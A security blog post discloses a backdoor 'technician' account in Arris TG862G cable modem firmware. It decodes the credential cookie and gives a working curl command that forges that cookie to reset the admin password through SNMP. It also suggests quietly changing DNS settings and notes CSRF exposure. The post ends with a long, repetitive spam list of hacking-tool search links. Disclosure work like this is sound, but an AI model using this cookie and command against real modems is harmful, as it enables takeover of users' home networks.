Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

Related articles

1. Hacker Tool Kit
2. Tools For Hacker
3. Hack Tools
4. World No 1 Hacker Software
5. Hacking Tools Online
6. Physical Pentest Tools
7. Hack Tools For Mac
8. Hack Tools Github
9. Hack Tools For Pc
10. Pentest Tools Subdomain
11. Beginner Hacker Tools
12. Pentest Box Tools Download
13. Blackhat Hacker Tools
14. Tools For Hacker
15. Hack Tools Github
16. Hack Tools For Games
17. Pentest Tools Android
18. Hacker Tools Linux
19. Best Hacking Tools 2019
20. Nsa Hacker Tools
21. Hacking Apps
22. Hacking Tools 2019
23. Pentest Tools Alternative
24. Hacking Tools Usb
25. Hacker Tools Mac
26. Pentest Tools Nmap
27. Hack Tools Pc
28. Pentest Tools Review
29. Hacker Search Tools
30. Hacking Tools Hardware
31. Hacks And Tools
32. Hack Tools For Pc
33. Hack Tools
34. Hack Tools
35. Hacker Tools For Pc
36. Hacker Tools For Pc
37. Pentest Tools Kali Linux
38. Pentest Tools Github
39. Hacking Tools Github
40. What Are Hacking Tools
41. Hacking Tools Github
42. Growth Hacker Tools
43. What Are Hacking Tools
44. Pentest Tools Find Subdomains
45. Growth Hacker Tools
46. Usb Pentest Tools
47. Hack App
48. Hacking Tools 2020
49. Pentest Tools For Android
50. Pentest Tools Website Vulnerability
51. Hacker Tools For Ios
52. Hack Tools 2019
53. Hacking Tools Windows
54. Pentest Tools Url Fuzzer
55. Pentest Tools For Mac
56. Pentest Recon Tools
57. Hack Tools
58. Tools Used For Hacking
59. Hacking Tools
60. Hacker Tools Mac
61. Hacking Tools For Beginners
62. Pentest Tools For Ubuntu
63. Hack Apps
64. Usb Pentest Tools
65. Hacking Tools Kit
66. Hacker Tools Linux
67. How To Make Hacking Tools
68. Hacker Tools Linux
69. Pentest Tools Linux
70. Hacker Tools Mac
71. Hacking Tools For Windows Free Download
72. Hacking Tools For Kali Linux
73. Hack Website Online Tool
74. Tools Used For Hacking
75. Pentest Tools Apk
76. Pentest Tools Website Vulnerability
77. Pentest Tools Nmap
78. Pentest Tools Linux
79. Pentest Tools Find Subdomains
80. Tools For Hacker
81. Hacker Tools For Ios
82. Hacker Tools 2020
83. Pentest Tools Find Subdomains
84. Pentest Tools Review
85. Hak5 Tools
86. Hack App
87. Beginner Hacker Tools
88. Kik Hack Tools
89. Pentest Tools Android
90. Hacker Tools For Windows
91. Hack Apps
92. Top Pentest Tools
93. Hack Tools Online
94. Best Pentesting Tools 2018
95. Wifi Hacker Tools For Windows
96. Pentest Tools Review
97. How To Install Pentest Tools In Ubuntu
98. Black Hat Hacker Tools
99. Hacker Tools 2019
100. Hacker Techniques Tools And Incident Handling
101. Pentest Tools
102. Hacking App
103. Pentest Tools Kali Linux
104. Pentest Tools Subdomain
105. Pentest Tools List
106. Computer Hacker
107. Easy Hack Tools
108. Hack Tools Online
109. Hack Tools For Mac
110. Computer Hacker
111. Pentest Tools For Mac
112. Hacking Tools Mac
113. Blackhat Hacker Tools
114. Hacker Tools Linux
115. Hack Tools For Mac
116. Hacking Tools
117. Tools 4 Hack
118. Hacking Tools Online
119. Pentest Tools Url Fuzzer
120. Pentest Tools Subdomain
121. Pentest Tools Linux
122. Hacking Tools For Kali Linux
123. Pentest Tools Online
124. World No 1 Hacker Software
125. Pentest Tools Android
126. Hacker Hardware Tools
127. Hacking Tools Free Download
128. Hak5 Tools
129. How To Hack
130. Pentest Tools Review
131. Hacking Tools For Games
132. Nsa Hack Tools Download